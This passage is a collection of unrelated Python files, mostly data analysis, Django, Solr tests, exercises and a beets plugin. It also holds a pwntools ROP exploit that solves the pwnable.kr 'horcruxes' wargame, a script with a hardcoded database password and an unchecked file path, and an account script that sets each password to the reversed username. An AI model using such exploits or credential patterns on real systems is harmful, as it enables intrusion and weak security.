tenth_grade = school_data_complete.loc[school_data_complete['grade'] == '10th']
tenth_grade = tenth_grade[['school_name','grade','reading_score']]
tenth_grade_read_avg = tenth_grade.groupby(['school_name']).mean()
# In[202]:
eleventh_grade = school_data_complete.loc[school_data_complete['grade'] == '11th']
eleventh_grade = eleventh_grade[['school_name','grade','reading_score']]
eleventh_grade_read_avg = eleventh_grade.groupby(['school_name']).mean()
# In[203]:
twelveth_grade = school_data_complete.loc[school_data_complete['grade'] == '12th']
twelveth_grade = twelveth_grade[['school_name','grade','reading_score']]
twelveth_grade_read_avg = twelveth_grade.groupby(['school_name']).mean()
# In[214]:
school_reading_by_grade = pd.merge(ninth_grade_read_avg, tenth_grade_read_avg, on=["school_name"])
school_reading_by_grade = school_reading_by_grade.rename(columns={'reading_score_x':'9th','reading_score_y':'10th'} )
school_reading_by_grade = pd.merge(school_reading_by_grade, eleventh_grade_read_avg, on=["school_name"])
school_reading_by_grade = pd.merge(school_reading_by_grade, twelveth_grade_read_avg, on=["school_name"])
school_reading_by_grade = school_reading_by_grade.rename(columns={'reading_score_x':'11th','reading_score_y':'12th'} )
school_reading_by_grade
# ## Scores by School Spending
# * Create a table that breaks down school performances based on average Spending Ranges (Per Student). Use 4 reasonable bins to group school spending. Include in the table each of the following:
# * Average Math Score
# * Average Reading Score
# * % Passing Math
# * % Passing Reading
# * Overall Passing Rate (Average of the above two)
# In[218]:
# Sample bins. Feel free to create your own bins.
bins = [0, 585, 620, 650, 675]
group_names = ["<$585", "$585-620", "$620-650", "$645-660"]
# In[219]:
school_data_finalreport.head()
# In[220]:
school_data_finalreport['Spending Ranges (Per Student)'] = pd.cut(school_data_finalreport["Per Student Budget"], bins, labels=group_names)
school_data_studentcostbin = school_data_finalreport.drop(columns=['Total Students','Total School Budget','Per Student Budget'])
school_data_studentcostbin.groupby(['Spending Ranges (Per Student)']).mean()
# ## Scores by School Size
# * Perform the same operations as above, based on school size.
# In[234]:
# Sample bins. Feel free to create your own bins.
size_bins = [0, 1000, 3000, 5000]
group_names = ["Tall <1000", "Grande 1000-3000", "Venti 3000-5000"]
# In[235]:
school_data_finalreport['School Size'] = pd.cut(school_data_finalreport['Total Students'], size_bins, labels=group_names)
school_data_studentsizebin = school_data_finalreport.drop(columns=['Total Students','Total School Budget','Per Student Budget'])
school_data_studentsizebin.groupby(['School Size']).mean()
# ## Scores by School Type
# * Perform the same operations as above, based on school type.
# In[236]:
school_data_typereport = school_data_finalreport.drop(columns=['Total Students','Total School Budget','Per Student Budget'])
school_data_typereport.groupby(['School Type']).mean()
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import configparser
import logging
import pkg_resources
import time
from nexustiles.dao.SolrProxy import SolrProxy
from shapely.geometry import box
class TestQuery(unittest.TestCase):
def setUp(self):
config = configparser.RawConfigParser()
config.readfp(pkg_resources.resource_stream(__name__, "config/datastores.ini"), filename='datastores.ini')
self.proxy = SolrProxy(config)
logging.basicConfig(level=logging.DEBUG)
def test_find_distinct_section_specs_in_polygon(self):
result = self.proxy.find_distinct_bounding_boxes_in_polygon(box(-180, -90, 180, 90),
"MXLDEPTH_ECCO_version4_release1",
1, time.time())
print(len(result))
for r in sorted(result):
print(r)
def test_find_all_tiles_in_polygon_with_spec(self):
result = self.proxy.find_all_tiles_in_polygon(box(-180, -90, 180, 90),
"AVHRR_OI_L4_GHRSST_NCEI",
fq={'sectionSpec_s:\"time:0:1,lat:100:120,lon:0:40\"'},
rows=1, limit=1)
print(result)
def test_find_tiles_by_id(self):
result = self.proxy.find_tiles_by_id(['0cc95db3-293b-3553-b7a3-42920c3ffe4d'], ds="AVHRR_OI_L4_GHRSST_NCEI")
self.assertIsInstance(result, list)
self.assertIs(len(result), 1)
print(result)
def test_find_max_date_from_tiles(self):
result = self.proxy.find_max_date_from_tiles(["a764f12b-ceac-38d6-9d1d-89a6b68db32b"],
"JPL-L4_GHRSST-SSTfnd-MUR-GLOB-v02.0-fv04.1", rows=1, limit=1)
print(result)
def test_find_tiles_by_exact_bounds(self):
result = self.proxy.find_tiles_by_exact_bounds(175.01, -42.68, 180.0, -40.2,
"JPL-L4_GHRSST-SSTfnd-MUR-GLOB-v02.0-fv04.1", rows=5000)
print(len(result))
def test_get_data_series_list(self):
result = self.proxy.get_data_series_list()
print(len(result))
def test_find_all_tiles_by_metadata(self):
result = self.proxy.find_all_tiles_by_metadata(['granule_s:19811114120000-NCEI-L4_GHRSST-SSTblend-AVHRR_OI-GLOB-v02.0-fv02.0.nc'], ds="AVHRR_OI_L4_GHRSST_NCEI")
print(len(result))
def test_get_tile_count(self):
tile_count = self.proxy.get_tile_count("AVHRR_OI_L4_GHRSST_NCEI", bounding_polygon=box(-180, -90, 180, 90),
start_time=1, end_time=time.time(),
metadata=['granule_s:19811114120000-NCEI-L4_GHRSST-SSTblend-AVHRR_OI-GLOB-v02.0-fv02.0.nc'])
print(tile_count)
def test_get_data_series_stats(self):
print((self.proxy.get_data_series_stats('AVHRR_OI_L4_GHRSST_NCEI')))
def test_find_days_in_range_asc(self):
print((self.proxy.find_days_in_range_asc(-90, 90, -180, 180, 'AVHRR_OI_L4_GHRSST_NCEI', 1, time.time())))
|
# coding: utf-8
from requests_html import AsyncHTMLSession, HTMLSession, requests
def retry_session(retries=5, session=HTMLSession()):
retry = requests.urllib3.util.retry.Retry(
total=retries,
read=retries,
connect=retries,
status_forcelist=(500, 502, 503, 504),
)
adapter = requests.adapters.HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
requests.urllib3.disable_warnings()
return session
def get_asession():
return retry_session(session=AsyncHTMLSession())
def asession_get(url, params=None):
ua = 'Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+'
return get_asession().get(url=url, params=params, timeout=3, verify=False, headers={'user-agent': ua})
|
from django.shortcuts import render, redirect
from apps.ninja_gold.models import Wallet, Form
# Create your views here.
def index(request):
# del request.session["activites"]
wallet = Wallet(request)
context = {
'total': wallet.total_gold,
'activites': wallet.activites
}
return render(request, 'ninja/index.html', context)
def find_gold(request):
if request.method == 'POST':
wallet = Wallet(request)
form = Form(request.POST)
if form.is_valid():
wallet.find_gold(form.cleaned_data['ninja'])
return redirect('/')
|
from pyasn1.type.univ import SequenceOf, noValue
from asn1PERser.codec.per.encoder import encode_sequence_of
from asn1PERser.codec.per.decoder import decode_sequence_of
from asn1PERser.classes.types.constraint import SequenceOfValueSize, MAX
class SequenceOfType(SequenceOf):
subtypeSpec = SequenceOfValueSize(0, MAX)
def fill_field_list(self, field_list):
sequence_of_field_list = encode_sequence_of(self)
if sequence_of_field_list:
field_list.extend(sequence_of_field_list)
def create_field_list(self, per_bytes):
decoded = decode_sequence_of(self, per_bytes)
return decoded
def to_dict(self, is_root=True):
component_list = []
for componentValue in self:
if (componentValue is not noValue and componentValue.isValue) or hasattr(componentValue, 'componentType'):
value_dict = componentValue.to_dict(is_root=False)
if value_dict is not noValue:
component_list.append(value_dict)
if is_root:
return component_list
if not component_list:
return noValue
return component_list
|
def f(string):
length = len(string)
for a in xrange(1, length + 1):
current = string[:a]
number = length / a
if current * number == string:
return current, number
|
"""
Time complexity: O(N)
Space complexity: O(1)
Compiled on leetcode: Yes
Difficulties faced: None
"""
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
headASize = 0
headBSize = 0
currentNode = headA
while currentNode is not None:
headASize += 1
currentNode = currentNode.next
currentNode = headB
while currentNode is not None:
headBSize += 1
currentNode = currentNode.next
if headASize > headBSize:
for i in range(headASize - headBSize):
headA = headA.next
else:
for i in range(headBSize - headASize):
headB = headB.next
while headA is not None and headB is not None:
if headA == headB:
return headA
else:
headA = headA.next
headB = headB.next
return None |
import json
from datetime import date, timedelta
from django.views.generic import TemplateView
from djofx import models
from djofx.utils import qs_to_monthly_report
from djofx.views.base import PageTitleMixin, UserRequiredMixin
class MonthlyTransactionsView(PageTitleMixin, UserRequiredMixin, TemplateView):
template_name = 'djofx/monthly.html'
page_title = 'Monthly Breakdown'
def get_report_by_type(self, type):
cutoff = date.today() - timedelta(days=180)
cutoff = cutoff.replace(day=1)
qs = models.Transaction.objects.filter(
account__owner=self.request.user,
transaction_category__category_type=type,
date__gte=cutoff
)
return json.dumps(qs_to_monthly_report(qs, type))
def get_context_data(self, **kwargs):
ctx = super(MonthlyTransactionsView, self).get_context_data(**kwargs)
ctx['outgoings'] = self.get_report_by_type(
models.TransactionCategory.OUTGOINGS
)
ctx['income'] = self.get_report_by_type(
models.TransactionCategory.INCOME
)
return ctx
|
# Generated by Django 3.2 on 2021-05-07 17:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('myapp', '0004_auto_20210505_1940'),
]
operations = [
migrations.RenameField(
model_name='equipo',
old_name='fecha_puestaenmarcha',
new_name='fecha_puesta_en_marcha',
),
migrations.RenameField(
model_name='equipo',
old_name='numerodeserie',
new_name='numero_de_serie',
),
migrations.RenameField(
model_name='equipo',
old_name='tipoequipo',
new_name='tipo_equipo',
),
migrations.RenameField(
model_name='ticket',
old_name='numeroreferencia',
new_name='numero_referencia',
),
]
|
#bubble sort
import random
import math
# 1. an outer loop decreases in size each time
# 2. the goal is to have the largest no. at the end of the list when outer loop completes 1 cycle
# 3. the inner loop starts comparing indexes at the begining of the loop
# 4. check if list[Index] > list[Index + 1]
# 5. if so swap the index values
# 6. when inner loop completes the largest no is at the end of the list
# 7. decrement the outer loop by 1
numList = [] #create a list
for i in range(5):
numList.append(random.randrange(1, 10))
i = len(numList) - 1 #to get index no in the list
while i > 1: #outer loop
j = 0
while j < i: #inner loop
print("\n Is {} > {}" .format(numList[j], numList[j + 1]))
if numList[j] > numList[j + 1]:
print("switch") #basic debugging
temp = numList[j] #swap values
numList[j] = numList[j + 1]
numList[j + 1] = temp
else:
print("nothing switched")
j +=1
for k in numList:
print(k, end="")
print()
print("end of round")
i -= 1
for k in numList:
print(k, end=",")
print()
|
# -*- coding: utf-8 -*-
"""
Query data download (export) functionality.
"""
import os
import datetime
import base64
import logging
import json
from sys import stderr
from django.conf import settings
from django.utils.text import get_valid_filename
from .tasks import zipquerydata
logger = logging.getLogger(__name__)
def create_zipname(user, query):
"""
Returns a (valid) filename for the zipfile containing the exported data.
"""
date_created = query.date_created.strftime('%Y.%m.%d-%H.%M.%S')
return get_valid_filename('_'.join([user.username, query.title, date_created]))
def execute(query, req_dict, zip_basename, to_email, email_message):
"""Expires old data and then compiles the Celery task
for sending the export via email.
"""
if settings.DEBUG:
print >> stderr, "execute()"
logger.debug("%s: %s" % (__name__, "execute()"))
if settings.QUERY_DATA_DELETE_DATA:
expire_data() # delete old download stuff
# add the request parameters
req_dict['zip_basename'] = zip_basename
req_dict['to_email'] = to_email
req_dict['email_message'] = email_message
req_dict.update(query.get_query_dict())
if settings.DEBUG:
print >> stderr, req_dict
# convert to base64
req_str = json.dumps(req_dict)
req_base64 = base64.b64encode(req_str)
if settings.DEBUG:
print >> stderr, req_base64
if settings.DEBUG:
print 'Calling zipquerydata\n'
zipquerydata(req_base64)
msg = 'management/download/' # - Celery task id: {}'.format(task.id)
logger.info(msg)
return msg
def expire_data():
"""Deletes old data from the data folder.
"""
msg = "%s: %s" % (__name__, "expire_data()")
logger.debug(msg)
if settings.DEBUG:
print >> stderr, "expire_data()"
ddir = settings.QUERY_DATA_DOWNLOAD_PATH
if settings.DEBUG:
print >> stderr, "download path:", ddir
time_now = datetime.datetime.now() # <type 'datetime.datetime'>
if settings.DEBUG:
print >> stderr, "time_now:", time_now
# Don't try to delete files if folder doesn't exist
if not os.path.exists(ddir):
return
files = os.listdir(ddir)
files.sort()
for fname in files:
if settings.DEBUG:
print >> stderr, fname
fpath = os.path.join(ddir, fname)
if settings.DEBUG:
print >> stderr, fpath
time_created_float = os.path.getctime(fpath)
time_created = datetime.datetime.fromtimestamp(time_created_float)
if settings.DEBUG:
print>> stderr, "time_created: %s" % time_created
elapsed = time_now - time_created
if settings.DEBUG:
print>> stderr, "elapsed: %s" % elapsed
if elapsed.days >= settings.QUERY_DATA_EXPIRE_DAYS:
msg = "deleting query data file: %s" % fpath
logger.debug(msg)
if settings.DEBUG:
print>> stderr, msg
try:
os.remove(fpath) # DELETING QUERY DATA DOWNLOAD FILE
except Exception as e:
msg = "deleting query data file failed: %s" % str(e)
logger.debug(msg)
if settings.DEBUG:
print >> stderr, msg
else:
msg = "keeping query data file: %s" % fpath
logger.debug(msg)
if settings.DEBUG:
print>> stderr, msg
|
A=int(input("A= "))
B=int(input("B= "))
C=int(input("C= "))
print((A>0) or (B>0) or (C>0)) |
import torch
from torch import nn
from torch.nn import functional as F
class DiceCELoss(nn.Module):
def __init__(self):
super(DiceCELoss, self).__init__()
def forward(self, inputs, targets, smooth=1e-7):
ce_loss = F.cross_entropy(inputs, targets)
inputs = inputs.log_softmax(dim=1).exp()
bs = targets.size(0)
num_classes = inputs.size(1)
dims = (0,2)
targets = targets.view(bs, -1)
inputs = inputs.view(bs, num_classes, -1)
targets = F.one_hot(targets, num_classes)
targets = targets.permute(0, 2, 1)
intersection = torch.sum(inputs * targets, dim=dims)
cardinality = torch.sum(inputs + targets, dim=dims)
dice = (2.0 * intersection + smooth) / (cardinality + smooth)
loss = 1 - dice
mask = targets.sum(dims) > 0
loss *= mask.to(loss.dtype)
return (loss.mean()) + ce_loss |
# Generated by Django 2.0.2 on 2018-02-25 00:40
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('articles', '0002_auto_20180224_1438'),
]
operations = [
migrations.RenameField(
model_name='article',
old_name='author_id',
new_name='author',
),
migrations.AlterUniqueTogether(
name='article',
unique_together={('author', 'title')},
),
]
|
#!/usr/bin/python3.4
# -*-coding:Utf-8
from random import randrange
from math import ceil
def couleur(cagnotte, mise) :
"""Fonction permettant de calculer le gain en cas de couleur ok"""
cagnotte = ceil(cagnotte - mise + (mise * 1.5))
print("Not bad x1.5")
return (cagnotte)
try :
cagnotte = input("Combien êtes vous prêt à jouer ... en $")
int(cagnotte)
assert cagnotte > 0
print("Ok commençons")
while cagnotte > 0 :
mise = input("Combien misez vous ?")
int(mise)
if mise <= 0 :
print("Pariez 0 ou un nombre négatif STOP le jeu")
break
if mise > cagnotte :
print("Pas assez de money broo...")
continue
bet = input("Sur quel numéro ?")
int(bet)
if bet < 0 or bet > 49 :
print("Pariez sur un nombre entre 0 et 49")
continue
result = randrange(50)
print("Le croupiez a tire le ...")
print(result)
if result == bet :
cagnotte = cagnotte - mise + (mise * 3)
print ("Bingo x3")
elif (bet % 2 == 0) and (result % 2 == 0) :
cagnotte = couleur(cagnotte, mise)
elif (bet % 2 != 0 and result % 2 != 0) :
cagnotte = couleur(cagnotte, mise)
else :
cagnotte = cagnotte - mise
print("Dommage...")
print("cagnotte =")
print(cagnotte)
result = 0
stop = input("Souhaitez-vous quitter le casino oui => 1 si non => 0 ? ")
int(stop)
if stop == 1:
print("Bye bye")
break
elif stop == 0 :
continue
else:
print("Je n'ai pas compris votre reponse ... continuons")
if cagnotte == 0 :
print("Sorry you loose all your money")
else :
print("Your money is :", cagnotte)
except AssertionError :
print("Cagnotte doit être positive")
except NameError :
print("Vous n'avez pas saisi de nombre")
except SyntaxError :
print("Saisissez un nombre correct")
|
#!/usr/bin/python3
from math import floor, sqrt
import sys
import mysql.connector
def BinaryTree(r):
return [r, [], []]
def insertLeft(root,newBranch):
t = root.pop(1)
if len(t) > 1:
root.insert(1,[newBranch,t,[]])
else:
root.insert(1,[newBranch, [], []])
return root
def insertRight(root,newBranch):
t = root.pop(2)
if len(t) > 1:
root.insert(2,[newBranch,[],t])
else:
root.insert(2,[newBranch,[],[]])
return root
def getLeftChild(root):
return root[1]
def getRightChild(root):
return root[2]
def print_leaves(root):
if root[1] == [] and root[2] == []:
print(str(root[0]))
else:
print_leaves(root[1])
print_leaves(root[2])
def is_prime(num):
print('checking whether prime: ' + str(num))
if num % 2 == 0:
candidate_divisor = 2
else:
candidate_divisor = 3
is_prime = True
while candidate_divisor <= floor(sqrt(num)):
if num % candidate_divisor == 0:
is_prime = False
break
if num % 2 == 0:
candidate_divisor += 1
else:
candidate_divisor += 2
return is_prime
def get_smallest_divisor(num):
candidate_divisor = 2
while candidate_divisor <= num:
if num % candidate_divisor == 0:
smallest_divisor = candidate_divisor
return smallest_divisor
candidate_divisor += 1
def get_prime_factors(num, root, list_of_factors):
if is_prime(num):
list_of_factors.append(num)
else:
divisor = get_smallest_divisor(num)
quotient = num//divisor
insertLeft(root, divisor)
insertRight(root, quotient)
print(str(root[0]))
print_leaves(root)
left_root = getLeftChild(root)
right_root = getRightChild(root)
get_prime_factors(divisor, left_root, list_of_factors)
get_prime_factors(quotient, right_root, list_of_factors)
def main():
user_name = sys.argv[1]
integer_to_factor = sys.argv[2]
output_file = '/var/www/html/UserFiles/' + user_name + '/' +\
integer_to_factor + '.txt'
sys.stdout = open(output_file, 'a')
num = int(integer_to_factor)
my_tree = BinaryTree(num)
list_of_fac = []
get_prime_factors(num, my_tree, list_of_fac)
print('\n')
print_leaves(my_tree)
conn = mysql.connector.connect(host='localhost',database='test',
user='web',password='sesame')
cursor = conn.cursor()
# need to do WHERE user_id = ..., since file_name is not unique to user
query = "UPDATE test.files SET complete = 1 WHERE file_name = %s"
cursor.execute(query, [integer_to_factor])
conn.commit()
cursor.close()
conn.close()
main()
|
import numpy as np
import cv2
def convex():
img = cv2.imread('images/lightning.png')
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
rows, cols = img.shape[:2]
ret, thr = cv2.threshold(imgray, 127, 255, 0)
_, contours, _ = cv2.findContours(thr, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnt = contours[4]
(x,y), r = cv2.minEnclosingCircle(cnt)
#contour에 외접하는 원을 얻기 위해 사용. 리턴값은 원의 중심 좌표와 반지름
center = (int(x), int(y))
r = int(r)
cv2.circle(img, center, r, (255, 0, 0), 3)
ellipse = cv2.fitEllipse(cnt)
#contour를 최적으로 둘러싸는 타원을 얻기 위해 사용된다.
cv2.ellipse(img, ellipse, (0, 255, 0), 3)
[vx, vy, x, y] = cv2.fitLine(cnt, cv2.DIST_L2, 0, 0.01, 0.01)
ly = int((-x*vy/vx)+y)
ry = int(((cols-x)*vy/vx)+y)
cv2.line(img, (cols-1, ry), (0, ly), (0,0,255), 2)
cv2.imshow('fitting', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
convex()
|
# coding=UTF-8
from numpy import *
import random
import operator
import string
bug_rate = 0.20
#read_file = "C:/Users/Chris/Desktop/7.lang3.0.1_all.csv"
#save_file = "C:/Users/Chris/Desktop/7.lang3.0.1_all.csv"
def chang_array(inputs):
# print "str:",inputs
a1 = inputs
arr = []
j=0
for i in range((len(a1))):
if i == len(a1)-2:
arr.append(int(a1[i]))
if a1[i] == ',':
if j == 0:
j = i + 1
else:
arr.append(float(a1[j:i]))
j = i + 1
return array(arr)
'''开始计算欧式距离'''
def get_deances(inputs1,inputs2):
arr1 = inputs1
arr2 = inputs2
arr_difference = arr1 - arr2
arr_difference = arr_difference ** 2
arr_difference = arr_difference.sum()
arr_difference = arr_difference ** 0.5
return arr_difference
def made_bug(bug_inputs_vector,all_inputs_vector):
str_list = []
bug_vector = bug_inputs_vector[random.randrange(0,len(bug_inputs_vector))]
arr_deances_list = []
for i in range(len(all_inputs_vector)):
deances = get_deances(bug_vector,all_inputs_vector[i])
arr_deances_list.append(deances)
# for i in range(len(arr_deances_list)):
#print arr_deances_list[i]
#print min(arr_deances_list)
for i in range(len(arr_deances_list)):
if arr_deances_list[i] == min(arr_deances_list):
min_index = i
'''至此实现了与选中的的bug样本欧式距离最小的正立样本
下面开始实现算法进行新的样本的改造
根据公式:Yi = Xi +- (Xi - Zi) * r
r取0.15
'''
different_vector = bug_vector - all_inputs_vector[min_index]
new_vector = bug_vector + different_vector * 0.15
new_vector = new_vector ** 2
new_vector = new_vector ** 0.5
return new_vector
def MORPH_function(bug_rate,read_file,save_file):
f = open(read_file, 'a+')
print f.readline()
bug_inputs = [] # 装入有bug的行数,是str列表
bug_inputs_vector = []
all_inputs = [] # 装入每一行,是str形的列表
all_inputs_vector = []
str1 = [500]
line_num = 1
line_num_1 = 1
count_bug = 0
count = 0
inputs_2 = []
for line in f:
if line_num_1 == 1:
line_num_1 = line_num_1 + 1
else:
line_num_1 = line_num_1 + 1
# print line
if line_num == 1:
line_num = line_num + 1
else:
str1 = line
i = len(str1) - 2
count = count + 1
if str1[i] != '0':
char1 = str1[i]
#print char1
j = int('1')
count_bug = count_bug + 1
bug_inputs.append(str1)
arr = chang_array(line)
bug_inputs_vector.append(arr)
else:
all_inputs.append(line)
arr = chang_array(line)
all_inputs_vector.append(arr)
new_bug_list = []
# print round(float(len(bug_inputs_vector)) / len(all_inputs_vector), 2)
print len(all_inputs_vector)
while round(float(len(bug_inputs_vector)) / len(all_inputs_vector), 2) != bug_rate:
new_bug = made_bug(bug_inputs_vector, all_inputs_vector)
bug_inputs_vector.append(new_bug)
new_bug_list.append(new_bug)
# print len(bug_inputs_vector)
# print len(all_inputs_vector)
# print round(float(len(bug_inputs_vector)) / len(all_inputs_vector), 2)
for i in range(len(new_bug_list)):
str_list = []
for j in range(len(new_bug_list[i])):
str_list.append(new_bug_list[i][j])
for k in range(0, len(str_list)):
str_list[k] = round(str_list[k], 2)
new_str = str(str_list)
# print type(new_str)
out_bug_str = new_str[1:len(new_str) - 1]
bug_name_str = "lang\WordUtils.java\org.apache.commons.lang.WordUtils,"
new_bug_1 = bug_name_str + out_bug_str + '\n'
w = open(save_file, 'a+')
w.write(new_bug_1)
#print new_bug_1
w.close()
return
|
import unittest
from flask import current_app
from app import app, db
import os
class TestOnApp(unittest.TestCase):
"""Check some app configuration"""
def setUp(self):
self.app = app
self.app_context = self.app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
def test_app_exists(self):
self.assertIsNotNone(current_app)
def test_valid_secret_key(self):
"""assert whether SECRET_KEY env variable is set to something different from the default unsafe value"""
self.assertNotEqual(current_app.config["SECRET_KEY"],
"hard to guess string") |
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
elf = ELF('horcruxes')
A = elf.symbols['A']
B = elf.symbols['B']
C = elf.symbols['C']
D = elf.symbols['D']
E = elf.symbols['E']
F = elf.symbols['F']
G = elf.symbols['G']
call_ropme = 0x0809fffc
def parse_exp(output: str) -> int:
output = output.split('\n')[1:][:-1]
exp_sum = 0
for line in output:
# You found "Tom Riddle's Diary" (EXP +833130388)
print(line)
exp = int(line.rsplit(' ', 1)[1][1:][:-1])
exp_sum += exp
return exp_sum
if __name__ == '__main__':
shell = ssh(host='pwnable.kr', user='horcruxes', password='guest', port=2222)
proc = shell.run('nc 0 9032') # according to the readme file
payload = 30 * b'AAAA'
payload += p32(A)
payload += p32(B)
payload += p32(C)
payload += p32(D)
payload += p32(E)
payload += p32(F)
payload += p32(G)
payload += p32(call_ropme) # return to main() and call ropme()
proc.recvuntil('Select Menu:')
proc.sendline('6')
proc.recvuntil('How many EXP')
proc.sendline(payload)
output = proc.recvuntil('Select Menu:')
proc.sendline('6')
# Sum up all exp points.
exp_sum = parse_exp(output.decode('utf-8'))
print("total exp: {}".format(exp_sum))
proc.recvuntil('How many EXP did you earned?')
proc.sendline(str(exp_sum))
proc.interactive()
shell.close()
|
from __future__ import print_function
import sys
import os
import requests
import logging
import json
from os.path import dirname
from jsonschema import validate
import importlib
import pkgutil
from halocli.util import Util
logger = logging.getLogger(__name__)
logging.root.setLevel(logging.INFO)
class PluginError(Exception):
pass
class Plugin():
def __init__(self,halo):
#init vars
self.halo = halo
#init work on halo config
#if self.halo.config ...
self.name = 'validate'
self.desc = 'validate settings file'
# set commands
self.commands = {
'test': {
'usage': "test this for your HALO project",
'lifecycleEvents': ['resources', 'functions']
},
'valid': {
'usage': "do this for your HALO project",
'lifecycleEvents': ['resources', 'functions'],
'options': {
'service': {
'usage': 'Name of the service',
'required': True,
'shortcut': 's'
}
},
},
}
# set hooks
self.hooks = {
'before:valid:resources': self.before_valid_resources,
'valid:resources': self.valid_resources,
'after:valid:functions': self.after_valid_functions,
}
#logger.info('finished plugin')
def run_plugin(self,options):
self.options = options
#do more
def before_valid_resources(self):
pass
def valid_resources(self):
service = None
if hasattr(self, 'options'):
if self.options:
for o in self.options:
if 'service' in o:
service = o['service']
if not service:
raise Exception("no service found")
ret = Util.valid(self.halo.settings, service)
if ret == 0:
self.halo.cli.log("finished valid seccessfuly")
return ret
def after_valid_functions(self):
import time
time.sleep(1)
pass
|
import sys
import os
import json
import nltk
import pickle
import torch
import torch.nn.functional as F
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import matplotlib.ticker as ticker
import numpy as np
def main():
data_path = os.path.join(sys.argv[1], 'valid.json')
with open(data_path) as f:
data = json.load(f)
embedding_path = os.path.join(sys.argv[1], 'embedding.pkl')
with open(embedding_path, 'rb') as f:
embedding = pickle.load(f)
contexts = data[0]['messages-so-far'][-1]['utterance']
contexts = nltk.word_tokenize(contexts)
options = data[0]['options-for-correct-answers'][-1]['utterance']
options = nltk.word_tokenize(options)
contexts_e = []
options_e = []
for context in contexts:
contexts_e.append(embedding.to_index(context))
for option in options:
options_e.append(embedding.to_index(option))
contexts_e = torch.tensor(contexts_e)
options_e = torch.tensor(options_e)
embed = torch.nn.Embedding(embedding.vectors.size(0),
embedding.vectors.size(1))
contexts_e = embed(contexts_e)
contexts_e = torch.unsqueeze(contexts_e, 0)
options_e = embed(options_e)
options_e = torch.unsqueeze(options_e, 0)
lstm = torch.nn.LSTM(300, 128, batch_first=True, bidirectional=True)
context_lstm, (h_n, c_n) = lstm(contexts_e)
option_lstm, (h_n, c_n) = lstm(options_e)
atten = torch.bmm(option_lstm, context_lstm.transpose(1, 2))
atten_soft = F.softmax(atten, dim=2)
atten_soft = torch.squeeze(atten_soft)
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(atten_soft.detach().numpy(), cmap='bone')
fig.colorbar(cax)
ax.set_xticklabels(contexts, rotation=45)
ax.set_yticklabels(options)
ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.savefig("atten_visualize.png")
if __name__ == "__main__":
nltk.download("punkt")
main()
|
a=int(input())
s=list(map(int,input().split()))
su=0
se=0
for i in range(a):
if i%2==0:
su=su+s[i]
else:
se+=s[i]
print(max(su,se))
|
from Auth import Auth
auth = Auth("auth_info.json")
user_csv = open("student_info.csv", "r")
user_csv.readline()
for line in user_csv:
split = line.split(",")
username = split[2][1:-1]
password = username[::-1]
auth.create_user(username, password)
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Updates an MPD index whenever the library is changed.
Put something like the following in your config.yaml to configure:
mpd:
host: localhost
port: 6600
password: seekrit
"""
from beets.plugins import BeetsPlugin
import os
import socket
from beets import config
# No need to introduce a dependency on an MPD library for such a
# simple use case. Here's a simple socket abstraction to make things
# easier.
class BufferedSocket:
"""Socket abstraction that allows reading by line."""
def __init__(self, host, port, sep=b'\n'):
if host[0] in ['/', '~']:
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(os.path.expanduser(host))
else:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.buf = b''
self.sep = sep
def readline(self):
while self.sep not in self.buf:
data = self.sock.recv(1024)
if not data:
break
self.buf += data
if self.sep in self.buf:
res, self.buf = self.buf.split(self.sep, 1)
return res + self.sep
else:
return b''
def send(self, data):
self.sock.send(data)
def close(self):
self.sock.close()
class MPDUpdatePlugin(BeetsPlugin):
def __init__(self):
super().__init__()
config['mpd'].add({
'host': os.environ.get('MPD_HOST', 'localhost'),
'port': int(os.environ.get('MPD_PORT', 6600)),
'password': '',
})
config['mpd']['password'].redact = True
# For backwards compatibility, use any values from the
# plugin-specific "mpdupdate" section.
for key in config['mpd'].keys():
if self.config[key].exists():
config['mpd'][key] = self.config[key].get()
self.register_listener('database_change', self.db_change)
def db_change(self, lib, model):
self.register_listener('cli_exit', self.update)
def update(self, lib):
self.update_mpd(
config['mpd']['host'].as_str(),
config['mpd']['port'].get(int),
config['mpd']['password'].as_str(),
)
def update_mpd(self, host='localhost', port=6600, password=None):
"""Sends the "update" command to the MPD server indicated,
possibly authenticating with a password first.
"""
self._log.info('Updating MPD database...')
try:
s = BufferedSocket(host, port)
except OSError as e:
self._log.warning('MPD connection failed: {0}',
str(e.strerror))
return
resp = s.readline()
if b'OK MPD' not in resp:
self._log.warning('MPD connection failed: {0!r}', resp)
return
if password:
s.send(b'password "%s"\n' % password.encode('utf8'))
